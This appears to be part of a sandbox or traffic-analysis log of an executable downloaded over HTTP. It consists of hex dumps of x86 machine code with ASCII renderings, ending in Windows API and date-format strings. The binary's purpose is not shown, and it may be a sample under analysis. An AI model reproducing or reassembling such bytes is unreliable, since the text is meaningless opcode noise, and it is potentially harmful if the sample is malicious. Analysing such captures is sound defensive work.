                                                            2023-08-02 08:13:04 UTC2431INData Raw: 65 fc 00 e8 1e af fd ff 8b 75 08 59 eb 2a 50 51 8d 4e 0c e8 c4 8b ff ff 85 c0 74 0f 8b f0 ff 75 e4 e8 00 af fd ff 59 8b c6 eb 22 ff 75 e4 80 65 fc 00 e8 ef ae fd ff 59 43 e9 46 ff ff ff 33 c0 eb 0b b8 3a cb 42 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 10 00 56 8b f2 57 8b f9 8d 46 0c 8d 56 08 50 e8 3e 00 00 00 85 c0 75 37 8b 07 66 83 38 3a 74 07 b8 57 00 07 80 eb 28 6a 01 6a 00 8b cf e8 25 aa fd ff 8d 46 04 8b d6 50 8b cf e8 13 00 00 00 85 c0 75 0c 8b 47 04 f7 d8 1b c0 25 57 00 07 80 5f 5e c3 56 57 8b 7c 24 0c 8b f1 83 27 00 e8 0a 98 ff ff 85 c0 74 2a 50 6a 00 8b ce e8 e7 a9 fd ff 8b 06 66 83 38 53 75 29 6a 01 6a 00 8b ce e8 d4 a9 fd ff 8b d7 8b ce e8 e0 97 ff ff 85 c0 75 07 b8 57 00 07 80 eb 0c 50 6a 00 8b ce e8 b6 a9 fd ff 33 c0
                                                            Data Ascii: euY*PQNtuY"ueYCF3:BM_^d[VWFVP>u7f8:tW(jj%FPuG%W_^VW|$'t*Pjf8Su)jjuWPj3
                                                            2023-08-02 08:13:04 UTC2447INData Raw: 24 0c 8b f1 3b 7e 1c 7c 13 53 8d 5e 14 6a 00 8b cb e8 27 a1 00 00 3b 7e 1c 7d f2 5b 8b 4e 20 8a 44 24 10 84 c0 88 04 39 74 24 3b 7e 08 7c 0d 6a 00 6a 00 8b ce e8 73 2d ff ff eb ee 8b 46 0c 8b 4c 24 14 89 0c f8 8b 4c 24 18 89 4c f8 04 5f 5e c2 10 00 b8 48 78 47 00 e8 41 ad 03 00 83 ec 14 56 57 8b f9 8d b7 58 02 00 00 8b ce e8 ca 7a fd ff 81 c7 c8 01 00 00 8d 4d e0 57 e8 2f 3b ff ff 6a 0e 33 ff 5a 8d 4d e0 89 7d fc e8 3f 01 00 00 6a 0f 8d 4d e0 5a e8 34 01 00 00 6a 11 8b d6 8d 4d e0 e8 d7 00 00 00 6a 10 8b d6 8d 4d e0 e8 cb 00 00 00 6a 09 8b d6 8d 4d e0 e8 bf 00 00 00 6a 06 8b d6 8d 4d e0 e8 b3 00 00 00 6a 12 8b d6 8d 4d e0 e8 a7 00 00 00 6a 14 8b d6 8d 4d e0 e8 9b 00 00 00 6a 13 8b d6 8d 4d e0 e8 8f 00 00 00 6a 15 8b d6 8d 4d e0 e8 83 00 00 00 6a 0a 8b d6
                                                            Data Ascii: $;~|S^j';~}[N D$9t$;~|jjs-FL$L$L_^HxGAVWXzMW/;j3ZM}?jMZ4jMjMjMjMjMjMjMjMj
                                                            2023-08-02 08:13:04 UTC2463INData Raw: 3b c3 0f 85 3f 01 00 00 39 5e 18 74 65 8b ce e8 8f fc ff ff ff 46 28 8b f8 3b fb c6 46 39 01 75 1c 8b 4e 34 3b cb 74 15 8b 56 10 3b d3 74 0e 8b 46 48 2b 46 20 50 e8 df af fd ff 8b f8 39 5e 10 75 16 80 7e 1c 00 74 10 39 5e 34 74 0b 6a 01 8b ce e8 0f fc ff ff eb 07 8b ce e8 32 fc ff ff 3b c3 0f 85 e0 00 00 00 3b fb 74 9d 8b c7 e9 d5 00 00 00 80 66 1c 00 83 7d ec 00 0f 87 b3 00 00 00 8b 5d 10 e9 d1 fe ff ff 8b 46 0c 8b 4e 28 8b 40 08 3b c8 7d 3a 8b 46 08 8b 56 24 03 d1 33 ff 8b 48 20 8b 40 0c 8d 0c d1 8b 11 8b 49 04 8b 04 90 8b 56 48 8b 40 70 8b 04 88 8b 48 10 89 4e 3c 8b 4e 4c 8b 40 0c 3b f9 77 17 72 04 3b c2 73 07 b8 05 40 00 80 eb 71 3b f9 72 2c 77 04 3b c2 76 26 8b c8 2b 4e 48 3b 4d 0c 72 03 8b 4d 0c 01 4d ec 85 db 74 05 8b 55 ec 89 13 01 4d 08 29 4d 0c
                                                            Data Ascii: ;?9^teF(;F9uN4;tV;tFH+F P9^u~t9^4tj2;;tf}]FN(@;}:FV$3H @IVH@pHN<NL@;wr;s@q;r,w;v&+NH;MrMMtUM)M
                                                            2023-08-02 08:13:04 UTC2479INData Raw: e8 7a 03 00 00 8d 46 18 8d 8d 18 fe ff ff 50 6a 08 5b 8b d3 e8 1e 03 00 00 84 c0 0f 84 c9 01 00 00 8d 7e 1c 8b d3 57 8d 8d 20 fe ff ff e8 05 03 00 00 84 c0 75 03 83 27 00 8d 7e 20 8b d3 57 8d 8d 28 fe ff ff e8 ed 02 00 00 84 c0 75 03 83 27 00 0f b6 85 30 fe ff ff 0f b6 8d 31 fe ff ff c1 e0 08 0b c1 0f b6 8d 32 fe ff ff c1 e0 08 0b c1 0f b6 8d 33 fe ff ff c1 e0 08 0b c1 3d 00 00 00 80 8d 46 10 89 45 0c 75 6a 0f b6 85 34 fe ff ff 0f b6 8d 35 fe ff ff c1 e0 08 0b c1 0f b6 8d 36 fe ff ff c1 e0 08 0b c1 0f b6 8d 37 fe ff ff 0f b6 bd 39 fe ff ff c1 e0 08 0b c1 33 c9 8b d0 0f b6 85 38 fe ff ff c1 e0 08 0b c7 0f b6 bd 3a fe ff ff c1 e0 08 0b c7 0f b6 bd 3b fe ff ff c1 e0 08 0b c7 33 ff 0b c8 8b 45 0c 0b d7 89 08 89 50 04 eb 17 50 6a 0c 5a 8d 8d 30 fe ff ff e8 df
                                                            Data Ascii: zFPj[~W u'~ W(u'0123=FEuj4567938:;3EPPjZ0
                                                            2023-08-02 08:13:04 UTC2495INData Raw: 65 fc 00 8d 4d 80 e8 56 00 00 00 33 c0 eb 0b b8 07 cb 43 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 14 00 8b c1 33 c9 89 08 89 48 04 89 48 08 89 48 0c 89 48 10 89 48 14 89 48 18 89 48 1c 89 48 20 89 48 28 89 48 2c 89 48 30 c7 40 34 04 00 00 00 c7 40 24 30 b8 47 00 c3 b8 a7 87 47 00 e8 33 ed 02 00 51 51 56 8b f1 57 89 75 f0 83 65 fc 00 8d 7e 24 89 7d ec c7 07 30 b8 47 00 8b cf c6 45 fc 05 e8 ac ba fc ff 8b cf c6 45 fc 04 e8 78 ba fc ff 8b 46 20 c6 45 fc 03 85 c0 74 06 8b 08 50 ff 51 08 8b 46 1c c6 45 fc 02 85 c0 74 06 8b 08 50 ff 51 08 8b 46 14 c6 45 fc 01 85 c0 74 06 8b 08 50 ff 51 08 8b 46 10 80 65 fc 00 85 c0 74 06 8b 08 50 ff 51 08 8b 76 0c 83 4d fc ff 85 f6 74 06 8b 06 56 ff 50 08 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 c9 c3 e9 53
                                                            Data Ascii: eMV3CM_^d[3HHHHHHHH H(H,H0@4@$0GG3QQVWue~$}0GEExF EtPQFEtPQFEtPQFetPQvMtVPM_^dS
                                                            2023-08-02 08:13:04 UTC2511INData Raw: e8 fe fc ff ff 8a 46 40 8b cf 50 e8 c1 fc ff ff 8a 46 41 8b cf 50 e8 b6 fc ff ff 8a 06 80 7d fd 00 88 45 f8 74 08 3c 2d 73 04 c6 45 f8 2d ff 75 f8 8b cf e8 99 fc ff ff 8a 46 01 8b cf 50 e8 8e fc ff ff 66 8b 46 02 8b cf 50 e8 91 fc ff ff 66 8b 46 04 8b cf 50 e8 85 fc ff ff ff 76 08 8b cf e8 9e fc ff ff ff 76 0c 8b cf e8 94 fc ff ff 80 7d ff 00 74 05 83 c8 ff eb 03 8b 46 10 50 8b cf e8 7e fc ff ff 80 7d 0b 00 74 05 83 c8 ff eb 03 8b 46 18 53 50 8b cf e8 67 fc ff ff ff 76 24 8b cf e8 3a fc ff ff 8a 5d fe 8a 45 ff f6 db 1b db 83 e3 08 f6 d8 1b c0 83 e0 08 03 d8 8a 45 0b f6 d8 1b c0 83 e0 08 03 d8 8a 45 fd f6 d8 8d 4b 04 1b c0 23 c1 8a 8e 8a 00 00 00 f6 d9 1b c9 83 e1 24 03 c1 8d 4e 68 89 45 f8 e8 83 fe ff ff 01 45 f8 8b cf ff 75 f8 e8 e5 fb ff ff ff b6 80 00
                                                            Data Ascii: F@PFAP}Et<-sE-uFPfFPfFPvv}tFP~}tFSPgv$:]EEEK#$NhEEu
                                                            2023-08-02 08:13:04 UTC2527INData Raw: 4e 24 c7 44 24 78 ff ff ff ff e8 6b 32 ff ff 8d 4e 4c e8 63 32 ff ff 8d 4e 74 e8 5b 32 ff ff 8b 86 b4 00 00 00 85 c0 74 10 8b 10 50 ff 52 08 c7 86 b4 00 00 00 00 00 00 00 8b c7 e9 c9 00 00 00 8b 44 24 14 c6 44 24 78 00 85 c0 74 06 8b 08 50 ff 51 08 8b 74 24 10 c7 44 24 78 ff ff ff ff 8d 4e 24 e8 13 32 ff ff 8d 4e 4c e8 0b 32 ff ff 8b 46 74 33 db 3b c3 74 09 8b 10 50 ff 52 08 89 5e 74 8b 86 b4 00 00 00 3b c3 74 0c 8b 08 50 ff 51 08 89 9e b4 00 00 00 8b c7 eb 6e 8b 44 24 14 c6 44 24 78 00 3b c3 74 06 8b 10 50 ff 52 08 8b 74 24 10 c7 44 24 78 ff ff ff ff 8b 46 24 3b c3 74 09 8b 08 50 ff 51 08 89 5e 24 8b 46 4c 3b c3 74 09 8b 10 50 ff 52 08 89 5e 4c 8b 46 74 3b c3 74 09 8b 08 50 ff 51 08 89 5e 74 8b 86 b4 00 00 00 3b c3 74 a3 8b 10 50 ff 52 08 89 9e b4 00 00
                                                            Data Ascii: N$D$xk2NLc2Nt[2tPRD$D$xtPQt$D$xN$2NL2Ft3;tPR^t;tPQnD$D$x;tPRt$D$xF$;tPQ^$FL;tPR^LFt;tPQ^t;tPR
                                                            2023-08-02 08:13:04 UTC2543INData Raw: 9c 70 02 00 00 8b 2a 83 c2 04 03 cd 46 3b c8 72 f4 8d 6e ff 3b eb 7e 20 3b 7c 24 18 74 1a 83 ff 01 74 15 8b 54 24 10 83 e2 01 80 fa 01 75 09 8b f5 2b 8c b4 70 02 00 00 8b 6c 24 24 33 c0 3b c3 7c 08 3b c6 7d 04 33 d2 eb 05 ba 01 00 00 00 88 14 28 8b 54 24 38 40 3b c2 7c e3 8b 44 24 1c 8b de 8b 74 24 10 2b c1 4f 46 81 ed 02 01 00 00 89 44 24 1c 85 ff 89 74 24 10 89 6c 24 24 0f 85 6f ff ff ff 8b 6c 24 54 c7 44 24 28 04 00 00 00 8b 5c 24 18 33 d2 8d b5 20 06 00 00 33 c0 8b fe 42 b9 02 01 00 00 81 c6 08 04 00 00 3b d3 f3 ab 7c ea 33 c9 8d 85 80 36 00 00 89 4c 24 34 89 44 24 1c 8b 54 24 3c 33 ff 8d 74 24 70 33 c0 8a 04 11 41 3d ff 00 00 00 72 08 33 db 8a 1c 11 03 c3 41 89 06 47 83 c6 04 83 ff 32 7d 06 3b 4c 24 20 72 da 89 4c 24 30 c7 44 24 24 ff ff ff ff c7 44
                                                            Data Ascii: p*F;rn;~ ;|$ttT$u+pl$$3;|;}3(T$8@;|D$t$+OFD$t$l$$ol$TD$(\$3 3B;|36L$4D$T$<3t$p3A=r3AG2};L$ rL$0D$$D
                                                            2023-08-02 08:13:04 UTC2559INData Raw: 8b c2 89 56 04 3b c1 75 07 8b ce e8 bb 24 fc ff 8b 4e 28 c7 46 28 08 00 00 00 d3 eb 85 ff c6 46 2c 00 77 b0 e9 78 02 00 00 25 ff ff 00 00 33 d2 33 c9 89 44 24 14 8a 90 f0 13 49 00 8d b5 70 04 00 00 89 54 24 1c 8a 8c 2a 3d 08 00 00 8b 9c 95 80 11 00 00 8b f9 85 ff 76 7d 8b 46 28 3b f8 72 4b b9 08 00 00 00 2b f8 2b c8 8a c3 8b 2e d2 e0 8a 4e 2c 0a c1 8b 4e 04 88 04 29 8b 6e 04 8b 4e 08 45 8b c5 89 6e 04 3b c1 75 0b 8b ce e8 39 24 fc ff 8b 54 24 1c 8b 4e 28 c7 46 28 08 00 00 00 d3 eb 85 ff c6 46 2c 00 77 b0 eb 23 8b 6e 28 b0 01 8b cf d2 e0 b9 08 00 00 00 2b cd fe c8 22 c3 d2 e0 8a 4e 2c 0a c8 2b ef 88 4e 2c 89 6e 28 8b 44 24 14 8b 6c 24 10 8b 8d e0 04 00 00 33 db 8a 1c 11 8b 8d dc 04 00 00 8b fb 33 db 8a 1c 11 2b c3 85 ff 8b d8 76 71 8b 46 28 3b f8 72 47 b9
                                                            Data Ascii: V;u$N(F(F,wx%33D$IpT$*=v}F(;rK++.N,N)nNEn;u9$T$N(F(F,w#n(+"N,+N,n(D$l$33+vqF(;rG
                                                            2023-08-02 08:13:04 UTC2575INData Raw: 00 00 00 00 5e c3 90 90 90 90 90 90 90 90 56 8b 74 24 08 8d 4e 30 e8 94 e4 fb ff 85 c0 75 0b 8b 8e ac 1c 00 00 e8 c4 fc ff ff 5e c2 04 00 51 8b 41 2c 56 8d 71 08 8b 54 24 0c b9 0f 00 00 00 57 8b 7e 20 2b c8 d3 ef b9 11 00 00 00 03 c2 2b ca 89 46 24 81 e7 ff ff 01 00 d3 ef 83 f8 10 72 72 8b 06 8b 4e 04 3b c1 72 0d 8b ce e8 0e d5 fb ff 88 44 24 08 eb 09 8a 08 40 88 4c 24 08 89 06 8b 06 8b 4e 04 3b c1 72 0d 8b ce e8 ef d4 fb ff 88 44 24 10 eb 09 8a 10 40 88 54 24 10 89 06 8b 46 20 8b 4c 24 10 8b 54 24 08 81 e1 ff 00 00 00 c1 e0 08 0b c1 8b 4e 24 c1 e0 08 81 e2 ff 00 00 00 83 c1 f0 0b c2 89 4e 24 89 46 20 8b c1 83 f8 10 73 8e 8b c7 5f 5e 59 c2 04 00 90 90 90 90 81 ec b4 00 00 00 53 55 56 33 db 57 8b e9 33 f6 6a 04 8b cd e8 37 ff ff ff 88 44 34 28 46 83 fe 14
                                                            Data Ascii: ^Vt$N0u^QA,VqT$W~ ++F$rrN;rD$@L$N;rD$@T$F L$T$N$N$F s_^YSUV3W3j7D4(F
                                                            2023-08-02 08:13:04 UTC2591INData Raw: 90 b1 47 00 c7 41 04 80 b1 47 00 e9 ae ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 6a ff 68 9e 9b 47 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 81 ec 94 00 00 00 53 55 8b e9 56 57 8d 4c 24 1c e8 48 94 fb ff 33 ff 89 bc 24 ac 00 00 00 89 7c 24 40 89 7c 24 44 89 7c 24 54 89 7c 24 60 68 00 00 10 00 8d 4c 24 20 c6 84 24 b0 00 00 00 01 e8 2c 94 fb ff 84 c0 75 62 8d 4c 24 40 c6 84 24 ac 00 00 00 02 e8 34 a3 fb ff 8b 44 24 54 c6 84 24 ac 00 00 00 00 3b c7 74 06 8b 08 50 ff 51 08 8d 4c 24 1c c7 84 24 ac 00 00 00 03 00 00 00 e8 2b 94 fb ff 8b 44 24 28 c7 84 24 ac 00 00 00 ff ff ff ff 3b c7 0f 84 90 00 00 00 8b 10 50 ff 52 08 b8 0e 00 07 80 e9 26 06 00 00 8b 84 24 b4 00 00 00 8d 4c 24 1c 50 e8 04 94 fb ff 8d 4c 24 1c e8 0a 94 fb ff 68 00 00 10 00 8d 4c 24
                                                            Data Ascii: GAGjhGdPd%SUVWL$H3$|$@|$D|$T|$`hL$ $,ubL$@$4D$T$;tPQL$$+D$($;PR&$L$PL$hL$
                                                            2023-08-02 08:13:04 UTC2607INData Raw: ff ff 5f 5e 5b 83 f9 03 76 11 8b 54 24 18 33 c0 89 02 8b c5 5d 83 c4 0c c2 0c 00 8b 54 24 18 49 d3 e0 83 e0 07 89 02 8b c5 5d 83 c4 0c c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 2c 83 fa 10 73 08 33 c0 83 c4 2c c2 08 00 8b 44 24 30 53 55 83 ea 10 56 2b c1 57 89 54 24 28 c7 44 24 10 00 00 00 00 8b f9 89 44 24 24 90 0f b6 07 83 e0 1f 0f b6 88 bc c5 47 00 b8 05 00 00 00 33 f6 89 4c 24 20 89 44 24 1c 89 74 24 18 8b 54 24 20 8b ce d3 ea f6 c2 01 0f 84 84 01 00 00 8b f0 8b c8 c1 ee 03 0f b6 44 37 05 99 0f a4 c2 08 c1 e0 08 8b d8 0f b6 44 37 04 8b ea 99 83 e1 07 03 d8 0f b6 44 37 03 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 44 37 02 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 44 37 01 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 04 37 13 ea 0f a4 dd 08
                                                            Data Ascii: _^[vT$3]T$I],s3,D$0SUV+WT$(D$D$$G3L$ D$t$T$ D7D7D7D7D77
                                                            2023-08-02 08:13:04 UTC2623INData Raw: 75 08 8b d1 c7 02 02 00 00 00 83 7e 78 08 0f 85 da fd ff ff e9 5f fd ff ff bd 01 00 00 00 e9 61 fd ff ff 8b 44 24 48 c7 00 02 00 00 00 e9 50 fd ff ff 8b 4c 24 48 c7 01 03 00 00 00 e9 41 fd ff ff 8b 54 24 48 c7 02 03 00 00 00 e9 32 fd ff ff 8b e8 e9 2d fd ff ff 5f 5e 8b c5 5d 5b 83 c4 24 c2 14 00 5f 5e 5d 33 c0 5b 83 c4 24 c2 14 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 08 8b 4c 24 10 8b 01 53 33 db 39 5f 18 55 8b 6c 24 14 0f 95 c3 89 44 24 0c c7 44 24 14 00 00 20 00 c7 01 00 00 00 00 83 c3 05 3b c3 73 0d 5d b8 07 00 00 00 5b 83 c4 08 c2 0c 00 8b 0f 2b c3 89 44 24 08 e8 a6 25 00 00 8b 57 14 8d 44 24 14 50 68 00 00 01 00 8d 4c 24 10 51 8b 0f 03 dd 53 e8 6a 62 00 00 8b 54 24 14 85 d2 0f 84 9f 01 00 00 56 85 c0 75 2c 8b 74 24 0c 8d 46 02 3b c2 73
                                                            Data Ascii: u~x_aD$HPL$HAT$H2-_^][$_^]3[$L$S39_Ul$D$D$ ;s][+D$%WD$PhL$QSjbT$Vu,t$F;s
                                                            2023-08-02 08:13:04 UTC2639INData Raw: 0f b6 8c 24 80 00 00 00 57 8d bd a0 0e 03 00 e8 da f0 ff ff eb 50 0f b6 84 24 80 00 00 00 c7 44 24 34 00 00 00 00 0d 00 01 00 00 8d 49 00 8b c8 c1 e9 08 0f b7 14 4f 8b c8 c1 e9 07 83 e1 01 f7 d9 c1 f9 04 83 e1 7f c1 ea 04 33 d1 8b 4c 24 34 03 8c 95 a0 0e 03 00 03 c0 89 4c 24 34 3d 00 00 01 00 72 ca 8b c1 8b 54 24 2c 03 d0 89 54 24 2c 3b 93 d0 06 00 00 73 2c 89 93 d0 06 00 00 8b 54 24 14 89 93 e8 06 00 00 c7 83 ec 06 00 00 ff ff ff ff c7 83 d8 06 00 00 00 00 00 00 c7 44 24 28 01 00 00 00 8b 4c 24 40 0f b7 84 4d b0 25 03 00 0f b7 94 75 30 27 03 00 35 f0 07 00 00 c1 e8 04 8b 84 85 a0 0e 03 00 03 44 24 24 81 f2 f0 07 00 00 c1 ea 04 8b bc 95 a0 0e 03 00 8b 54 24 14 03 f8 89 44 24 58 8a 84 24 80 00 00 00 89 7c 24 48 38 44 24 13 75 61 39 93 e8 06 00 00 73 09 83
                                                            Data Ascii: $WP$D$4IO3L$4L$4=rT$,T$,;s,T$D$(L$@M%u0'5D$$T$D$X$|$H8D$ua9s
                                                            2023-08-02 08:13:04 UTC2655INData Raw: 24 14 8a 48 02 80 f9 07 73 14 fe 48 03 75 0f 66 d1 20 b2 03 d2 e2 fe c1 88 48 02 88 50 03 89 7e 08 8a 1f 8b ce e8 14 fb ff ff 5f 5e 5d 0f b6 c3 5b 81 c4 0c 05 00 00 c3 5f 5e 5d b8 fe ff ff ff 5b 81 c4 0c 05 00 00 c3 cc cc cc cc cc cc 33 c0 89 01 89 41 04 c7 41 08 ff ff ff ff 88 41 0c c7 41 10 01 00 00 00 89 41 14 c3 cc cc cc cc 8b 46 08 33 d2 f7 74 24 0c 53 bb 00 00 00 00 8b c8 0f af 4c 24 08 01 0e 11 5e 04 0f af 44 24 0c 89 46 08 3d 00 00 00 01 73 78 55 57 83 cd ff 90 8b 3e c1 66 08 08 81 ff 00 00 00 ff 72 10 8b 56 04 8b c7 b1 20 e8 36 67 00 00 85 c0 74 3a 8a 5e 0c 8b 06 8b 56 04 8b 7e 18 b1 20 e8 20 67 00 00 8b ca 8d 14 03 8b 07 8b cf ff d0 80 cb ff 01 6e 10 8b 46 10 11 6e 14 0b 46 14 75 d5 8b 3e 8b cf c1 e9 18 88 4e 0c 33 db 83 46 10 01 89 5e 04 11 5e
                                                            Data Ascii: $HsHuf HP~_^][_^][3AAAAAF3t$SL$^D$F=sxUW>frV 6gt:^V~ gnFnFu>N3F^^
                                                            2023-08-02 08:13:04 UTC2671INData Raw: 89 51 58 89 41 5c 89 41 60 89 81 a8 00 00 00 89 81 bc 00 00 00 89 81 d0 00 00 00 89 81 e4 00 00 00 89 01 89 41 04 89 41 48 89 41 4c c3 cc 83 c1 58 e9 98 f9 ff ff cc cc cc cc cc cc cc cc 83 ec 58 8b 44 24 5c 53 8b 5c 24 68 55 8b 6c 24 68 56 57 89 54 24 10 8b 13 8b f9 8b 08 c7 00 00 00 00 00 8b 44 24 7c c7 03 00 00 00 00 89 4c 24 1c 89 54 24 18 c7 00 00 00 00 00 eb 03 8d 49 00 8b 0b 8b 74 24 18 8b 07 2b f1 89 74 24 74 83 f8 06 0f 85 17 01 00 00 8b 44 24 1c 8b 4c 24 6c 2b 01 89 74 24 70 89 44 24 74 85 f6 75 08 85 c0 0f 84 91 05 00 00 8b 54 24 7c 8b 44 24 78 52 50 6a 00 8d 4c 24 7c 51 55 8d 94 24 88 00 00 00 52 8b 54 24 28 8d 4f 58 e8 d5 f9 ff ff 8b 74 24 74 8b 54 24 10 56 8d 8f 90 01 00 00 89 44 24 18 e8 ad f1 ff ff 8b 44 24 70 01 03 8b 4c 24 6c 03 e8 01 47
                                                            Data Ascii: QXA\A`AAHALXXD$\S\$hUl$hVWT$D$|L$T$It$+t$tD$L$l+t$pD$tuT$|D$xRPjL$|QU$RT$(OXt$tT$VD$D$pL$lG
                                                            2023-08-02 08:13:04 UTC2687INData Raw: 0f 83 e6 f0 eb 03 6a 10 5e 89 75 0c 89 7d dc 83 fe e0 0f 87 f3 00 00 00 6a 09 e8 59 1a 00 00 59 c7 45 fc 01 00 00 00 8d 45 d4 50 8d 45 c8 50 53 e8 3f 2d 00 00 83 c4 0c 8b f8 89 7d d0 85 ff 0f 84 aa 00 00 00 3b 35 5c 01 49 00 73 5c 8b de c1 eb 04 53 57 ff 75 d4 ff 75 c8 e8 dd 30 00 00 83 c4 10 85 c0 74 08 8b 45 08 89 45 dc eb 38 53 e8 9c 2d 00 00 59 89 45 dc 85 c0 74 2a 0f b6 07 c1 e0 04 89 45 cc 3b c6 72 02 8b c6 50 ff 75 08 ff 75 dc e8 37 fa ff ff 57 ff 75 d4 ff 75 c8 e8 28 2d 00 00 83 c4 18 8b 5d 08 83 7d dc 00 75 53 56 6a 00 ff 35 80 65 49 00 ff 15 8c a1 47 00 89 45 dc 85 c0 74 3d 0f b6 07 c1 e0 04 89 45 cc 3b c6 72 02 8b c6 50 53 ff 75 dc e8 f0 f9 ff ff 57 ff 75 d4 ff 75 c8 e8 e1 2c 00 00 83 c4 18 eb 13 56 53 6a 00 ff 35 80 65 49 00 ff 15 94 a1 47 00
                                                            Data Ascii: j^u}jYYEEPEPS?-};5\Is\SWuu0tEE8S-YEt*E;rPuu7Wuu(-]}uSVj5eIGEt=E;rPSuWuu,VSj5eIG
                                                            2023-08-02 08:13:04 UTC2703INData Raw: d5 8b f0 3b f3 74 0c c7 05 40 38 49 00 01 00 00 00 eb 28 ff 15 f0 a1 47 00 8b f8 3b fb 0f 84 ea 00 00 00 c7 05 40 38 49 00 02 00 00 00 e9 8f 00 00 00 83 f8 01 0f 85 81 00 00 00 3b f3 75 0c ff d5 8b f0 3b f3 0f 84 c2 00 00 00 66 39 1e 8b c6 74 0e 40 40 66 39 18 75 f9 40 40 66 39 18 75 f2 2b c6 8b 3d 44 a0 47 00 d1 f8 53 53 40 53 53 50 56 53 53 89 44 24 34 ff d7 8b e8 3b eb 74 32 55 e8 4e b4 ff ff 3b c3 59 89 44 24 10 74 23 53 53 55 50 ff 74 24 24 56 53 53 ff d7 85 c0 75 0e ff 74 24 10 e8 65 b5 ff ff 59 89 5c 24 10 8b 5c 24 10 56 ff 15 ec a1 47 00 8b c3 eb 53 83 f8 02 75 4c 3b fb 75 0c ff 15 f0 a1 47 00 8b f8 3b fb 74 3c 38 1f 8b c7 74 0a 40 38 18 75 fb 40 38 18 75 f6 2b c7 40 8b e8 55 e8 e7 b3 ff ff 8b f0 59 3b f3 75 04 33 f6 eb 0b 55 57 56 e8 cf b9 ff ff
                                                            Data Ascii: ;t@8I(G;@8I;u;f9t@@f9u@@f9u+=DGSS@SSPVSSD$4;t2UN;YD$t#SSUPt$$VSSut$eY\$\$VGSuL;uG;t<8t@8u@8u+@UY;u3UWV
                                                            2023-08-02 08:13:04 UTC2719INData Raw: f8 ff 8d 4d cc e9 91 cd f8 ff 8d 4d d8 e9 89 cd f8 ff 8d 4d c0 e9 81 cd f8 ff 8d 4d d8 e9 79 cd f8 ff 8d 4d c0 e9 71 cd f8 ff 8d 4d 94 e9 e7 39 fb ff 8d 4d 94 e9 df 39 fb ff 8d 4d bc e9 32 d9 f8 ff 8d 4d 94 e9 cf 39 fb ff b8 28 01 48 00 e9 02 6a ff ff cc cc 8d 4d e8 e9 3d cd f8 ff 8d 4d d0 e9 35 cd f8 ff 8d 4d dc e9 2d cd f8 ff b8 a8 01 48 00 e9 de 69 ff ff cc cc 8d 4d e0 e9 19 cd f8 ff b8 e0 01 48 00 e9 ca 69 ff ff cc cc 8d 4d e8 e9 05 cd f8 ff b8 08 02 48 00 e9 b6 69 ff ff cc cc 8d 4d e8 e9 f1 cc f8 ff b8 30 02 48 00 e9 a2 69 ff ff cc cc 8d 4d e0 e9 dd cc f8 ff b8 58 02 48 00 e9 8e 69 ff ff cc cc 8d 4d e0 e9 c9 cc f8 ff b8 80 02 48 00 e9 7a 69 ff ff cc cc 8d 4d e4 e9 b5 cc f8 ff 8d 4d cc e9 ad cc f8 ff 8d 4d d8 e9 a5 cc f8 ff b8 a8 02 48 00 e9 56 69 ff
                                                            Data Ascii: MMMMyMqM9M9M2M9(HjM=M5M-HiMHiMHiM0HiMXHiMHziMMMHVi
                                                            2023-08-02 08:13:04 UTC2735INData Raw: e9 96 8d f8 ff 8d 8d 34 ff ff ff e9 8b 8d f8 ff 8d 8d 1c ff ff ff e9 80 8d f8 ff 8d 8d 04 ff ff ff e9 75 8d f8 ff 8d 8d ec fe ff ff e9 6a 8d f8 ff b8 c8 66 48 00 e9 1b 2a ff ff cc cc cc 8b 4d f0 e9 d3 f9 fa ff b8 90 67 48 00 e9 06 2a ff ff cc cc ff 75 f0 e8 cc ee f8 ff 59 c3 b8 b8 67 48 00 e9 f0 29 ff ff 8d 4d d4 e9 f7 61 fc ff b8 e0 67 48 00 e9 de 29 ff ff cc cc b8 08 68 48 00 e9 d2 29 ff ff cc cc 8d 4d e0 e9 73 45 fc ff b8 98 68 48 00 e9 be 29 ff ff cc cc 8d 8d 58 ff ff ff e9 58 40 fc ff b8 c0 68 48 00 e9 a7 29 ff ff cc cc cc b8 20 69 48 00 e9 9a 29 ff ff cc cc 8d 4d d0 e9 9f 61 fc ff b8 78 69 48 00 e9 86 29 ff ff cc cc 8d 8d 58 ff ff ff e9 20 40 fc ff b8 a0 69 48 00 e9 6f 29 ff ff cc cc cc 8d 8d c4 fe ff ff e9 08 40 fc ff 8d 8d 5c ff ff ff e9 fd 3f fc
                                                            Data Ascii: 4ujfH*MgH*uYgH)MagH)hH)MsEhH)XX@hH) iH)MaxiH)X @iHo)@\?
                                                            2023-08-02 08:13:04 UTC2751INData Raw: 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 75 73 65 72 33 32 2e 64 6c 6c 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 36 22 47 00 3a 22 47 00 ff ff ff ff ea 22 47 00 ee 22 47 00 ff ff ff ff 6e 24 47 00 72 24 47 00 48 3a 6d 6d 3a 73 73 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 4d 2f 64 2f 79 79 00 00 50 4d 00 00 41 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00 00 4a 75 6e 65 00 00 00 00 41 70 72 69 6c 00 00 00 4d 61 72 63 68 00 00 00 46 65 62 72 75 61 72 79 00 00 00 00 4a 61 6e 75 61 72 79 00 44 65 63 00 4e 6f 76 00 4f 63 74 00 53 65 70 00 41
                                                            Data Ascii: opupGetActiveWindowMessageBoxAuser32.dll6"G:"G"G"Gn$Gr$GH:mm:ssdddd, MMMM dd, yyyyM/d/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepA
